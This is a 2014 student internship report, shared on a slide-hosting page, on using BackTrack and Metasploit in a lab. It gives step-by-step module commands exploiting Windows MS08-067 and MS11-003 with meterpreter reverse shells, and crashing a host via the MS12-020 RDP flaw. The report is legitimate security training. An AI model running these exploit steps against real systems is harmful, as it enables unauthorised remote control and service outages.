Liên Hán, profile picture
Uploaded byLiên Hán
DOCX, PDF1,676 views

Iu report

This internship report summarizes the internship activities of Đỗ Liên Hán at Athena Center from July 16th to August 16th, 2014. During the 8-week internship, Đỗ Liên Hán learned about network security and used the tool Backtrack to exploit vulnerabilities. Specifically, Đỗ Liên Hán installed Backtrack in a virtual machine, used it to attack vulnerabilities in Windows XP and Windows 7 like MS08-067 and MS11-003, and tested attacks from a virtual private server to a local machine. The internship provided valuable hands-on experience that will help Đỗ Liên Hán in future work.

Embed presentation

Downloaded 21 times
VIETNAM NATIONAL UNIVERSITY OF HCMC INTERNATIONAL UNIVERSITY INTERNSHIP REPORT by ĐỖ LIÊN HÁN Research and learn to use Backtrack to exploit Network vulnerabilities Submitted to: School of Computer Science and Engineering International University, VNU-HCM August, 2014
Page | 2 INTERNSHIP REPORT by Đỗ Liên Hán Submitted to: School of Computer Science and Engineering International University, VNU-HCM August, 2014 Organization/Company: Athena Center Address: 92 Nguyễn Đình Chiểu , DaKao, Q1 , Tp HCM Phone: (08)3 2210 3801 – 090 7879 477 Duration of the Internship: 8 weeks (16-07-2014 – 16-08-2014) Supervisors during the Internship: Supervisor: MR. Võ Đỗ Thắng. Tittle: Lecturer Phone: 0943230099
Page | 3 ACKNOWLEDGMENTS I would like to show my sincere gratitude to International University and Athena Center which have gave me condition to complete this Internship. In this internship, I have many important experiences and essential knowledge that will help me a lot in adapt to my later job. I also want to say thanks to professors in school of computer science and engineering have taught and equip me with necessary knowledge which help me complete this topic. Even though I have tried my best to complete this report, I believe that this report may remain some mistake because of the deficiency in practical experience and knowledge. I look forward to your understanding and sharing so I can make my report better. Hồ Chí Minh, August 1, 2014 Internship student Đỗ Liên Hán.
Page | 4 TABLE OF CONTENTS I. DESCRIPTION OF COMPANY/ORGANIZATION......................................................5 II. SUMMARY OF THE INTERNSHIP .............................................................................6 III. PLANNING ..................................................................................................................7 IV. INTERNSHIP ACTIVITIES & ACHIEVEMENTS .....................................................8 1. General information about security..............................................................8 2. Backtrack .....................................................................................................8 3. Footprinting................................................................................................14 4. Scanning.....................................................................................................16 5. Enumeration...............................................................................................17 V. INTERNSHIP ASSESSMENT.....................................................................................29 REFERENCES ..................................................................................................................30
Page | 5 I. Description of company/organization: Athena is an education and training center of IT field. It was establish in 2004. This center can allow people experience IT engineer’s work and study in order to contribute to develop IT fields in Vietnam. Company name written in English is ATHENA ADVICE TRAINING NETWORK SECURITY COMPANY LIMITED. The major field of Athena:  Athena center has been focusing deeply on educating and training of system and network security, network administrator, ecommerce,… follow the standard quality of Microsoft, Linux LPI, Oracle, Cisco, CEH,… Moreover, Athena center also has some separated program to train and educate for some government organizations.  After 10 years, many trainees from Athena center do the job in IT fields for some government organization and some big companies.  Besides training program, Athena center also cooperate and exchange technology with some universities such as university of technology, university of information technology, university of science,… The instructors of Athena:  All the instructors of Athena center graduated from many top universities in Vietnam. They all have to get international certificates such as CCNA, MCSA, MCSE, CCNP, security+, CEH and have Microsoft certificate trainer. These are required certificates to satisfy condition for teaching at Athena center.  Beside, Athena’s instructors are also go abroad to be updated new technologies from USA, French, Holland,… and they transfer what they learn to their learner at Athena.
Page | 6 II. Summary of Internship: Nowadays, many devices like PC, laptop and mobile phone have internet connection. On these devices install some program like IE, Microsoft Office, Acrobat Reader,…. and run on some operating system like window XP, window 7. Some mobile also face with some new techniques that allow hacker to add virus into some program which they download from internet; these virus can get information of the user when they don’t know any things. Even though they usually update from the producer, their devices are still in threatened by hacker. This topic is research about a program call backtrack which contain many module that allow people to use them to test the other machine with some already known vulnerabilities to gain control of the victim or just collect the information of them. During the internship, I learn to use backtrack from install it on VMWare and attack on local network between virtual PC of the VMWare. After that I test the attack of the Virtual Private Server to attack from different network to my local machine. In this topic, I test some vulnerability of windows XP and windows 7 which are ms08-067, ms11-003 and ms12-020. These errors can allow attacker to gather information of the user like computer name, OS, user access right and password.
Page | 7 III. Planning: - Week 1: Receive material and prepare backtrack with windows. Practice with vulnerability ms10_090, ms10_042. - Week 2: Test ms12_004. Find information about ms08_067, ms12_020. Practice with vulnerability ms08_067, ms12_020. - Week 3: Find information about ms11_003. Practice with vulnerability ms11_003. - Week 4: Install and practice with metasploit. RegisterVPS. - Week 5: Test attack from VPS to windows on VMWare of local machine. - Week 6: Try Exploit information from VPS to local machine. - Week 7: Complete systemhacking class. - Week 8: Review and prepare for presentation.
Page | 8 IV. Internship Activities & Achievements: 1. General information about network security: In july, we known a big problem have appear Viet Hong company has used a software to track everything of mobile phone like contact list, messages, phone calls of who has download the software called Ptracker used to spy customers. In this event happened, about 14,000 mobile have been attacked by this company and lost a lot of essential information. Ptracker will send every information about the user to this company, this company also records the phone call to or from the cell phones and messages which were installed Ptracker. From this event, we can see the importance of security in these days. When technology changes day by day, we must equip ourselves with enough knowledge about security or at least we must know something to make sure that our private information or our secret won’t be stolen by the others. 2. Backtrack: BackTrack was a Linux distribution, superseded by Kali Linux, that focused on security based on the Ubuntu Linux distribution aimed at digital forensics and penetration testing use. In March 2013, the Offensive Security team rebuilt BackTrack around the Debian distribution and released it under the name Kali Linux. The evolution of BackTrack spans many years of development, penetration tests, and unprecedented help from the security community. BackTrack originally started with earlier versions of live Linux distributions called Whoppix, IWHAX, and Auditor. When BackTrack was developed, it was designed to be an all in one live cd used on security audits and was specifically crafted to not leave any remnants of itself
Page | 9 on the laptop. It has since expanded to being the most widely adopted penetration testing framework in existence and is used by the security community all over the world.  Install backtrack on VMWare: First, I opened VMWare program and choose create a new virtual machine. After that I follow the step below to create a new backtrack system on unix.
Page | 10 In this backtrack virtual machine I installed it with 20GB memory, 512MB RAM and Network is NAT by use VMnet8. Choose Default Boot Text Mode to continue.
Page | 11 Wait for some seconds, this window will appear and I typed startx to open Graphical User Interface. When it starts with GUI choose “install backtrack” it opened the windows as follow picture.
Page | 12 To continue, I choose language for this backtrack program, time zone, memory, key broad setting and wait for it to install complete the program.
Page | 13 Until this part I can choose install to start install this software. After click install, I have to wait for some time to let the program install complete.
Page | 14 When it run complete this box will appear and click restart to make the computer restart again. When it restarts complete, I can use the basic account root of backtrack to login with user name: root and password: toor. Then start the GUI of backtrack to use by command “startx” . 3. Footprinting: A. Introduction: Footprinting is the first and most convenient way that hackers use to gather information about computer systems and the companies they belong to. The purpose of footprinting to learn as much as you can about a system, it's remote access capabilities, its ports and services, and the aspects of its security. In order to perform a successful hack on a system, it is best to know as much as you can, if not everything, about that system. While there is nary a company in the world that isn't aware of hackers, most companies are now hiring hackers to protect their systems. And since footprinting can be used to attack a system, it can also be used to protect it. If you can find anything out about a system, the company that owns that system, with the right personell, can find out anything they want about you.
Page | 15 An attacker will spend 90% of the time in profiling an organization and another 10% in launching the attack 1. Information gathering 2. Determining the network range 3. Identifying active machines 4. Finding open ports and access points 5. OS fingerprinting 6. Fingerprinting services 7. Mapping the network B. Type of footprinting: 1) Active footprinting: Contact directly to the target to seek for information about target like: name, address, owner, network, company, staff,… Contact through email to find everything that can get. This method requires many communication skills and skills to exploit information. 2) Passive footprinting: Different from active footprinting, passive footprinting is also popular. This is a way to collect information through many free sources from the internet instead of contact directly to employees or user of the target organization. For example, we can access to some website provide service to know more information about some domain name or address of website such as www.whoise.net, whoise.domaintools.com, www.tenmien.vn, www.google.com,...
Page | 16 4. Scanning: If footprinting is the identification of sources of information where the scanning is finding all the gates to get into the information. In the footprinting process, we have reached an IP network range and list the IP addresses through various techniques including query whois and ARIN. This technique gives administrators more security and hacker information contained on the destination network value, IP range, DNS servers and mail servers. In this chapter, we will determine which system is listening on network traffic and can be caught using a variety of tools and techniques such as ping sweeps, port scans. We can easily pass firewall manually (bypass firewalls) to scan the system assuming as it is blocked by the filtering policy criticism (filtering rules). Objects Scanning:  Live System: Determine whether the system that we are targeting with active or do not. Computers are scanning activity on the internet or not. IP address state is left exposed in public.  Port: The next goal is to determine the port is open. The determination of this port allows us to know that computers are open to public services. Since then determine the purpose of attacks.  Operating System: Identifying the operating system is used on the target computer will help hackers find out vulnerabilities common. The operating system is more or less hidden holes enabling hackers hacked. Determine the operating system must determine its version.  Service: Understanding the service is running and listening on the target system. Version of services also contains small errors, but if you know which exploits small, it does not little bit longer.
Page | 17  IP Address: Not only one of a host IP, we also carefully define address ranges network address, and other relevant host as Default Gateway, DNS Server,… 5. Enumeration: Enumeration is next step in process of finding information of some organizations, occurs after scanning and collection process and analyzing user names, computer names, share resources and services. It also actively queries or binds to target to get the information more reasonable. Enumeration can be defined process of extracting information which got from scanning process into an orderly system. The extracted information includes things related to the objectives to be attacked, such as the user name (user name), the computer name (host name) or services (service), resource sharing (share) listed are those techniques are controlled from inside the environment. Enumeration phase includes connecting to the system and directly extract the information. The aim of the technique is to identify the listed user accounts and system accounts have the ability to use the hack on a target. No need to look for an administrator account so we can increase this up to the account with privileges to allow access to multiple accounts than previously granted. Enumeration is also known as network or vulnerability discovery. It is the act of obtaining information that is readily available from the target's system, applications and networks. It is important to note that the enumeration phase is often the point where the line between an ethical hack and a malicious attack can become blurred as it is often easy to go outside of the boundaries outlined in the original attack plan. In order to construct a picture of an organization's environment, several tools and techniques are available. These tools and techniques include port scanning and
Page | 18 NMap. Although it is rather simple to collect information, it is rather difficult to determine the value of the information in the hands of a hacker. At first glance, enumeration is simple: take the collected data and evaluate it collectively to establish a plan for more reconnaissance or building a matrix for the vulnerability analysis phase. However, the enumeration phase is where the ethical hacker's ability to make logical deductions plays an enormous role.
Page | 19 6. MS08-067: MS08-067 is not categorized as virus, worm, Trojan or backdoor. It is a critical vulnerability in the Windows Server Service on Windows 2008/Vista/2003/XP/2000 computers, which allows hackers to gain remote control of the affected computer with the same privileges as the logged on user. The Server Service allows the user's local resources, such as disks and printers, to be shared, so that other users on the network can access them. However, there is a vulnerability because this service does not properly handle specially crafted RPC requests. Remote Procedure Call (RPC) is a protocol used by a program to request a service from a program located on another computer in a network. If exploited successfully, MS08-067 allows hackers to gain remote control of the affected computer with the same privileges as the logged on user. If this user had administrator rights, the hacker could take complete control of the system: create, modify or delete files, install programs, create new user accounts, etc. MS08-067 is usually exploited by sending a specially crafted network packet to a vulnerable system. On Windows Vista and Server 2008 systems, the attacking user must be authenticated.
Page | 20 I have a victim computer and try to gain control of this one. At first, I ping the IP address to make sure that victim computer have connection. Then use nmap command to check the victim computer vulnerable or not. When make sure that it is vulnerable, I start metaslpoit, and search for module.
Page | 21 Command:  Search ms08_067 – to find the module.  Use explioit/windows/smb/ms08_067_netapi – to apply module.  Show options – to see attribute of the module.  Set rhost 192.168.1.131- to specify the target  Set payload window/meterpreter/reverse_tcp - to create the response back  Set lhost 192..168.1.128 – to specify the ip of the attack PC to listen back information of the victim.  Exploit – to execute the module to acttack to the victim.
Page | 22
Page | 23 . Migrate to keep the connection with the victim computer. I can know the process run on the victim through command “ps” and “sysinfo” can allow me to know about computer information.
Page | 24 7. MS12_020: Vulnerabilities in Remote Desktop Could Allow Remote Code Execution and it only affect the computer which enable the Remote Desktop Protocol (RDP). By default, the Remote Desktop Protocol (RDP) is not enabled on any Windows operating system. This module exploits the MS12-020 RDP vulnerability originally discovered and reported by Luigi Auriemma. The flaw can be found in the way the T.125 ConnectMCSPDU packet is handled in the maxChannelIDs field, which will result an invalid pointer being used, therefore causing a denial-of-service condition. CVE-2012-0002 is an internally reported vulnerability in Microsoft's Remote Desktop Application. Patch for this vulnerability was released on March 13, 2012 as MS12-020. This vulnerability can cause a full system compromise. Failed attempts to exploit this vulnerability can cause a DoS for RDP.
Page | 25 This content some following command to exploit:  Msfconsole – to start metasploit.  Search ms12_020 – to find the module use in this test.  Use auxiliary/dos/windows/rdp/ms12_020_maxchannelids – to apply module.  Show options – to show attribute of this module.  Set rhost xxx.xxx.xxx.xxx – this is the command for me to type in the IP address of the target. Ex: set rhost 192.168.1.129 - in this example, 192.168.1.129 is the IP address of the target.  Run (or exploit) – this is the finally command to make the module active, then I get the result as the picture above. The operation system is crash so the computer was attacked and down. Every works were running at that time suddenly stop this will cause a lot of trouble for the user. The way to prevent this is set RDP is not enable.
Page | 26 8. MS11-003 1. Introduction: Microsoft Internet Explorer have another vulnerability after so many vulnerability have found by security researcher. The MS11_003 vulnerability actually found at February 08, 2011 according to Microsoft security bulletin. This module exploits a memory corruption vulnerability within Microsoft’s HTML engine (mshtml). When parsing an HTML page containing a recursive CSS import, a C++ object is deleted and later reused. This leads to arbitrary code execution. This exploit utilizes a combination of heap spraying and the .NET 2.0 ‘mscorie.dll’ module to bypass DEP and ASLR. This module does not opt-in to ASLR. As such, this module should be reliable on all Windows versions with .NET 2.0.50727 installed. 2. Exploiting Step by Step: To start, I use msfconsole to start metasploit then I use command search ms11_003 to find out the module for vulnerability ms11_003. Type command use exploit/windows/browser/ms11_003_ie_css_import to start the module. Type command set payload/windows/meterpreter/reverse_tcp to create the way for attackers to set the way for the PC to response when they successfully control the victim’s computer. Command show options will allow attacker to see the option they need to fill in.
Page | 27 Next, the attackers have to set the server host, the listen host, the port and the path so that they can receive the connection from the computer when the virus successfully runs at the computer. Finally, type the command exploit to make the metasploit generate a url from the computer to access.
Page | 28 And this picture, this is the attack success. The attacker transfers the virus to the computer access and gain control from the PC. After that,I can get information by command sysinfo, get user right by getuid,…
Page | 29 V. Internship Assessment: In the internship, I have learnt more information about some knowledge about security which I can’t found in my school about this program. Backtrack is a collection of tool for people who want to try to know more about security. Every vulnerabilities have appeared in this operation system has been found by many people and these were fixed. However, it doesn’t mean that this error will not happened in our computer even it was known because sometimes the error is not belong to the operation system it belong to the program run on the system that is what I know more about the system when I learn how to use backtrack find out.
Page | 30 VI. Reference [0] Athena Center internal Material and CDs. [1] http://www.pandasecurity.com/homeusers/security-info/201683/information/MS08-067 [2] https://technet.microsoft.com/en-us/library/security/ms12-020.aspx [3] https://technet.microsoft.com/en-us/library/security/ms08-067.aspx [4] https://technet.microsoft.com/en-us/library/security/ms11-003.aspx [5] http://www.hacking-tutorial.com/hacking-tutorial/exploiting-ms11_003-internet-explorer- vulnerability-using-metasploit-framework/#sthash.esO69EUT.dpbs

More Related Content

PPT
IT Essentials version 5.0 Presentation Lectures
bycrestjin03
 
PPTX
kali linux.pptx
byAdityaKumar1548
 
PPTX
Hacking vs cracking
byNaren Naren
 
PPTX
Social Networking
byMark Jhon Oxillo
 
PPTX
Backup data
byZaibi Gondal
 
PPTX
IT Security and Management - Security Policies
byMark John Lado, MIT
 
PPTX
kali linux Presentaion
byDev Gandhi
 
PPTX
Kali Linux Installation - VMware
byRonan Dunne, CEH, SSCP
 
IT Essentials version 5.0 Presentation Lectures
bycrestjin03
 
kali linux.pptx
byAdityaKumar1548
 
Hacking vs cracking
byNaren Naren
 
Social Networking
byMark Jhon Oxillo
 
Backup data
byZaibi Gondal
 
IT Security and Management - Security Policies
byMark John Lado, MIT
 
kali linux Presentaion
byDev Gandhi
 
Kali Linux Installation - VMware
byRonan Dunne, CEH, SSCP
 

What's hot

DOCX
Internship report
byAthena Vietnam
 
PDF
Sự hài lòng của khách hàng về dịch vụ mua sắm tại doanh nghiệp
byDịch Vụ Viết Bài Trọn Gói ZALO 0917193864
 
PPTX
Quản trị doanh nghiệp - Giao tiếp trong doanh nghiệp
byNguyen Tung
 
PDF
Vận dụng marketing vào đẩy mạnh kinh doanh dịch vụ vận tải hàng không tại hàn...
byDịch vụ viết bài trọn gói ZALO: 0909232620
 
DOC
Luận văn: Phát triển hoạt động kinh doanh dịch vụ logistics, 9 ĐIỂM
byViết Thuê Khóa Luận _ ZALO 0917.193.864 default
 
PDF
Bài tập thanh toán quốc tế
bycaoxuanthang
 
DOC
BÀI TIỂU LUẬN MARKETING NGHIÊN CỨU THỊ TRƯỜNG TIÊU DÙNG NHẬN BÀI MIỄN PHÍ ZAL...
byOnTimeVitThu
 
DOC
Hoàn thiện quy trình bán hàng nhằm nâng cao hiệu quả tiêu thụ sản phẩm tại Cô...
bylamluanvan.net Hỗ trợ viết luận văn
 
PDF
Luận văn: Bảo hiểm hàng hóa xuất nhập khẩu bằng đường biển, HOT
byDịch vụ viết bài trọn gói ZALO: 0909232620
 
PDF
Thực trạng và giải pháp nâng cao hoạt động logistics tại công ty cổ phần chân...
byjackjohn45
 
DOCX
hoat dong digital marketing tai cong ty nha khoa tham my ucare viet nam
byanh hieu
 
PDF
Luận văn: Những giải pháp hoàn thiện công tác chăm sóc khách hàng tại công ty...
byViết thuê trọn gói ZALO 0934573149
 
DOCX
Khóa Luận Tốt Nghiệp Giải Pháp Hoàn Thiện Quy Trình Nhập Khẩu Hàng Hoá Tại Cô...
byDịch vụ viết bài trọn gói ZALO: 0936 885 877
 
PDF
Chuyên đề quy trình lựa chọn và quản lý nhà cung cấp
byBuu Dang
 
DOC
Đề tài: Phân tích chiến lược bán hàng trực tuyến Lazada
byDịch vụ viết thuê Khóa Luận - ZALO 0932091562
 
DOC
tồ chức kênh phân phố trà xanh C2
byThủy Đại Phù
 
DOC
Khóa luận - Đánh giá chất lượng dịch vụ lưu trú tại khách sạn Hữu Nghị.doc
byDịch vụ viết thuê đề tài trọn gói ☎☎☎ Liên hệ ZALO/TELE: 0973.287.149 👍👍
 
PDF
Đề tài thực trạng và giải pháp bán hàng ô tô, HOT 2018, ĐIỂM CAO
byDịch Vụ Viết Bài Trọn Gói ZALO 0917193864
 
PDF
Luận văn tốt nghiệp: Nâng cao năng lực cạnh tranh sản phẩm chè xuất khẩu
byNguyễn Công Huy
 
DOC
Báo cáo thực tập cuối kỳ
byHiền Heoo
 
Internship report
byAthena Vietnam
 
Sự hài lòng của khách hàng về dịch vụ mua sắm tại doanh nghiệp
byDịch Vụ Viết Bài Trọn Gói ZALO 0917193864
 
Quản trị doanh nghiệp - Giao tiếp trong doanh nghiệp
byNguyen Tung
 
Vận dụng marketing vào đẩy mạnh kinh doanh dịch vụ vận tải hàng không tại hàn...
byDịch vụ viết bài trọn gói ZALO: 0909232620
 
Luận văn: Phát triển hoạt động kinh doanh dịch vụ logistics, 9 ĐIỂM
byViết Thuê Khóa Luận _ ZALO 0917.193.864 default
 
Bài tập thanh toán quốc tế
bycaoxuanthang
 
BÀI TIỂU LUẬN MARKETING NGHIÊN CỨU THỊ TRƯỜNG TIÊU DÙNG NHẬN BÀI MIỄN PHÍ ZAL...
byOnTimeVitThu
 
Hoàn thiện quy trình bán hàng nhằm nâng cao hiệu quả tiêu thụ sản phẩm tại Cô...
bylamluanvan.net Hỗ trợ viết luận văn
 
Luận văn: Bảo hiểm hàng hóa xuất nhập khẩu bằng đường biển, HOT
byDịch vụ viết bài trọn gói ZALO: 0909232620
 
Thực trạng và giải pháp nâng cao hoạt động logistics tại công ty cổ phần chân...
byjackjohn45
 
hoat dong digital marketing tai cong ty nha khoa tham my ucare viet nam
byanh hieu
 
Luận văn: Những giải pháp hoàn thiện công tác chăm sóc khách hàng tại công ty...
byViết thuê trọn gói ZALO 0934573149
 
Khóa Luận Tốt Nghiệp Giải Pháp Hoàn Thiện Quy Trình Nhập Khẩu Hàng Hoá Tại Cô...
byDịch vụ viết bài trọn gói ZALO: 0936 885 877
 
Chuyên đề quy trình lựa chọn và quản lý nhà cung cấp
byBuu Dang
 
Đề tài: Phân tích chiến lược bán hàng trực tuyến Lazada
byDịch vụ viết thuê Khóa Luận - ZALO 0932091562
 
tồ chức kênh phân phố trà xanh C2
byThủy Đại Phù
 
Khóa luận - Đánh giá chất lượng dịch vụ lưu trú tại khách sạn Hữu Nghị.doc
byDịch vụ viết thuê đề tài trọn gói ☎☎☎ Liên hệ ZALO/TELE: 0973.287.149 👍👍
 
Đề tài thực trạng và giải pháp bán hàng ô tô, HOT 2018, ĐIỂM CAO
byDịch Vụ Viết Bài Trọn Gói ZALO 0917193864
 
Luận văn tốt nghiệp: Nâng cao năng lực cạnh tranh sản phẩm chè xuất khẩu
byNguyễn Công Huy
 
Báo cáo thực tập cuối kỳ
byHiền Heoo
 

Similar to Iu report

DOCX
Iu report
byLiên Hán
 
PDF
Penetration Testing A Complete Pentesting Guide Facilitating Smooth Backtrack...
bytuchenjooh
 
PDF
CSEC 610 Individual Assignment Essay
byRochelle Schear
 
PDF
(Ebook) Learning Kali Linux by Ric Messier
byfiukerlet
 
PPTX
INTERNSHIPREVIEW-ISHAQ (1) [Recovered].pptx
bySuhailShaik16
 
PPTX
Final project.ppt
byshreyng
 
PDF
Pts syllabus
byMaggie Mahlia
 
PPTX
Overview of Vulnerability Scanning.pptx
byAjayKumar73315
 
PPTX
Summer internship ethical hacking internship presentation
bypsb9711888453
 
PPTX
9780840024220 ppt ch09
byKristin Harrison
 
PPTX
DC612 Day - Hands on Penetration Testing 101
bydc612
 
PPTX
The basics of hacking and penetration testing 이제 시작이야 해킹과 침투 테스트 kenneth.s.kwon
byKenneth Kwon
 
PPTX
Mis 450 final presentation
byGianna Passarelli
 
PPTX
Backtrack
byn|u - The Open Security Community
 
PPTX
Backtrack
byOne97 Communications Limited
 
DOCX
Ceh certified ethical hacker
bybestip
 
PPTX
BackTrack5 - Linux
bymariuszantal
 
PPT
Nomura UCCSC 2009
bydnomura
 
PDF
Cisel1 d
bychandu_sai
 
PDF
Preventing The Next Data Breach Through Log Management
byNovell
 
Iu report
byLiên Hán
 
Penetration Testing A Complete Pentesting Guide Facilitating Smooth Backtrack...
bytuchenjooh
 
CSEC 610 Individual Assignment Essay
byRochelle Schear
 
(Ebook) Learning Kali Linux by Ric Messier
byfiukerlet
 
INTERNSHIPREVIEW-ISHAQ (1) [Recovered].pptx
bySuhailShaik16
 
Final project.ppt
byshreyng
 
Pts syllabus
byMaggie Mahlia
 
Overview of Vulnerability Scanning.pptx
byAjayKumar73315
 
Summer internship ethical hacking internship presentation
bypsb9711888453
 
9780840024220 ppt ch09
byKristin Harrison
 
DC612 Day - Hands on Penetration Testing 101
bydc612
 
The basics of hacking and penetration testing 이제 시작이야 해킹과 침투 테스트 kenneth.s.kwon
byKenneth Kwon
 
Mis 450 final presentation
byGianna Passarelli
 
Backtrack
byn|u - The Open Security Community
 
Backtrack
byOne97 Communications Limited
 
Ceh certified ethical hacker
bybestip
 
BackTrack5 - Linux
bymariuszantal
 
Nomura UCCSC 2009
bydnomura
 
Cisel1 d
bychandu_sai
 
Preventing The Next Data Breach Through Log Management
byNovell
 

More from Liên Hán

DOCX
Report athena week 1
byLiên Hán
 
DOCX
Report athena week 1
byLiên Hán
 
DOCX
Report athena week 1
byLiên Hán
 
DOCX
Report week 4 & 5 & 6
byLiên Hán
 
DOCX
Report week 3
byLiên Hán
 
DOCX
Report week 2
byLiên Hán
 
Report athena week 1
byLiên Hán
 
Report athena week 1
byLiên Hán
 
Report athena week 1
byLiên Hán
 
Report week 4 & 5 & 6
byLiên Hán
 
Report week 3
byLiên Hán
 
Report week 2
byLiên Hán
 

Recently uploaded

PDF
Pass GitHub Copilot Exam Dumps & Questions 2026
byMinniePfeiffer
 
PDF
Information Model in the System for Measuring and Managing the Performance of...
byMarkus Groß
 
PDF
Idea To Domain Instantly with UnstoppableBot
byResQ Records | PiKture Time Films and Photography | Horizon Alliance Technologies
 
PDF
From AfroWarriors.NFT to Global Media Empire
byResQ Records | PiKture Time Films and Photography | Horizon Alliance Technologies
 
PDF
Presentation Design
byDr. Salem Baidas
 
PDF
story tellingstory tellingstory telling2025_jpg2pdf.pdf
by東京北医療センター
 
PDF
Elbow Anatomy & Biomechanics in few slides
byProfessor M. A. Imam
 
PDF
Best Practices for Maintaining Snapchat Ads Accounts.pdf
byBuy Old Facebook Accounts
 
PPTX
CESC also has multiple expansiocesc.pptx
bylorenzkent901
 
PPTX
CATIE: a regional platform for inclusive green development
byFrancois Stepman
 
PDF
Key Takeaways from the Close to You Workshop
byidealengage
 
PPTX
2026-01-04 Hebrews 01 (shared slides).pptx
byDale Wells
 
PPTX
Cognosy 2 roll 29 hryh6rjryj5j7bubd.pptx
byIshikaRajput19
 
PPTX
Unit - 1 History of Pharmaceutical Substances & Pharmacopoeia.pptx
byShyamSudarsan1
 
PPTX
14-Resins-I-Benzoin-Guggul-Ginger o.pptx
byIshikaRajput19
 
PPTX
Reclaiming Biocultural Knowledge through Education and Citizen Engagement for...
byFrancois Stepman
 
DOCX
17 Best Places to Buy Old Gmail Accounts in the US 2026 Full Setup.docx
byBuy Old Gmail Accounts
 
PPTX
NUS in agriculture curriculum towards food and nutritional security
byFrancois Stepman
 
PPTX
Reducing post-harvest losses of Neglected and Underutilized Species (NUS)
byFrancois Stepman
 
PPTX
community health nursing scopes .pptx
byPrernajaswal3
 
Pass GitHub Copilot Exam Dumps & Questions 2026
byMinniePfeiffer
 
Information Model in the System for Measuring and Managing the Performance of...
byMarkus Groß
 
Idea To Domain Instantly with UnstoppableBot
byResQ Records | PiKture Time Films and Photography | Horizon Alliance Technologies
 
From AfroWarriors.NFT to Global Media Empire
byResQ Records | PiKture Time Films and Photography | Horizon Alliance Technologies
 
Presentation Design
byDr. Salem Baidas
 
story tellingstory tellingstory telling2025_jpg2pdf.pdf
by東京北医療センター
 
Elbow Anatomy & Biomechanics in few slides
byProfessor M. A. Imam
 
Best Practices for Maintaining Snapchat Ads Accounts.pdf
byBuy Old Facebook Accounts
 
CESC also has multiple expansiocesc.pptx
bylorenzkent901
 
CATIE: a regional platform for inclusive green development
byFrancois Stepman
 
Key Takeaways from the Close to You Workshop
byidealengage
 
2026-01-04 Hebrews 01 (shared slides).pptx
byDale Wells
 
Cognosy 2 roll 29 hryh6rjryj5j7bubd.pptx
byIshikaRajput19
 
Unit - 1 History of Pharmaceutical Substances & Pharmacopoeia.pptx
byShyamSudarsan1
 
14-Resins-I-Benzoin-Guggul-Ginger o.pptx
byIshikaRajput19
 
Reclaiming Biocultural Knowledge through Education and Citizen Engagement for...
byFrancois Stepman
 
17 Best Places to Buy Old Gmail Accounts in the US 2026 Full Setup.docx
byBuy Old Gmail Accounts
 
NUS in agriculture curriculum towards food and nutritional security
byFrancois Stepman
 
Reducing post-harvest losses of Neglected and Underutilized Species (NUS)
byFrancois Stepman
 
community health nursing scopes .pptx
byPrernajaswal3
 

Iu report

  • 1.
    VIETNAM NATIONAL UNIVERSITYOF HCMC INTERNATIONAL UNIVERSITY INTERNSHIP REPORT by ĐỖ LIÊN HÁN Research and learn to use Backtrack to exploit Network vulnerabilities Submitted to: School of Computer Science and Engineering International University, VNU-HCM August, 2014
  • 2.
    Page | 2 INTERNSHIPREPORT by Đỗ Liên Hán Submitted to: School of Computer Science and Engineering International University, VNU-HCM August, 2014 Organization/Company: Athena Center Address: 92 Nguyễn Đình Chiểu , DaKao, Q1 , Tp HCM Phone: (08)3 2210 3801 – 090 7879 477 Duration of the Internship: 8 weeks (16-07-2014 – 16-08-2014) Supervisors during the Internship: Supervisor: MR. Võ Đỗ Thắng. Tittle: Lecturer Phone: 0943230099
  • 3.
    Page | 3 ACKNOWLEDGMENTS Iwould like to show my sincere gratitude to International University and Athena Center which have gave me condition to complete this Internship. In this internship, I have many important experiences and essential knowledge that will help me a lot in adapt to my later job. I also want to say thanks to professors in school of computer science and engineering have taught and equip me with necessary knowledge which help me complete this topic. Even though I have tried my best to complete this report, I believe that this report may remain some mistake because of the deficiency in practical experience and knowledge. I look forward to your understanding and sharing so I can make my report better. Hồ Chí Minh, August 1, 2014 Internship student Đỗ Liên Hán.
  • 4.
    Page | 4 TABLEOF CONTENTS I. DESCRIPTION OF COMPANY/ORGANIZATION......................................................5 II. SUMMARY OF THE INTERNSHIP .............................................................................6 III. PLANNING ..................................................................................................................7 IV. INTERNSHIP ACTIVITIES & ACHIEVEMENTS .....................................................8 1. General information about security..............................................................8 2. Backtrack .....................................................................................................8 3. Footprinting................................................................................................14 4. Scanning.....................................................................................................16 5. Enumeration...............................................................................................17 V. INTERNSHIP ASSESSMENT.....................................................................................29 REFERENCES ..................................................................................................................30
  • 5.
    Page | 5 I.Description of company/organization: Athena is an education and training center of IT field. It was establish in 2004. This center can allow people experience IT engineer’s work and study in order to contribute to develop IT fields in Vietnam. Company name written in English is ATHENA ADVICE TRAINING NETWORK SECURITY COMPANY LIMITED. The major field of Athena:  Athena center has been focusing deeply on educating and training of system and network security, network administrator, ecommerce,… follow the standard quality of Microsoft, Linux LPI, Oracle, Cisco, CEH,… Moreover, Athena center also has some separated program to train and educate for some government organizations.  After 10 years, many trainees from Athena center do the job in IT fields for some government organization and some big companies.  Besides training program, Athena center also cooperate and exchange technology with some universities such as university of technology, university of information technology, university of science,… The instructors of Athena:  All the instructors of Athena center graduated from many top universities in Vietnam. They all have to get international certificates such as CCNA, MCSA, MCSE, CCNP, security+, CEH and have Microsoft certificate trainer. These are required certificates to satisfy condition for teaching at Athena center.  Beside, Athena’s instructors are also go abroad to be updated new technologies from USA, French, Holland,… and they transfer what they learn to their learner at Athena.
  • 6.
    Page | 6 II.Summary of Internship: Nowadays, many devices like PC, laptop and mobile phone have internet connection. On these devices install some program like IE, Microsoft Office, Acrobat Reader,…. and run on some operating system like window XP, window 7. Some mobile also face with some new techniques that allow hacker to add virus into some program which they download from internet; these virus can get information of the user when they don’t know any things. Even though they usually update from the producer, their devices are still in threatened by hacker. This topic is research about a program call backtrack which contain many module that allow people to use them to test the other machine with some already known vulnerabilities to gain control of the victim or just collect the information of them. During the internship, I learn to use backtrack from install it on VMWare and attack on local network between virtual PC of the VMWare. After that I test the attack of the Virtual Private Server to attack from different network to my local machine. In this topic, I test some vulnerability of windows XP and windows 7 which are ms08-067, ms11-003 and ms12-020. These errors can allow attacker to gather information of the user like computer name, OS, user access right and password.
  • 7.
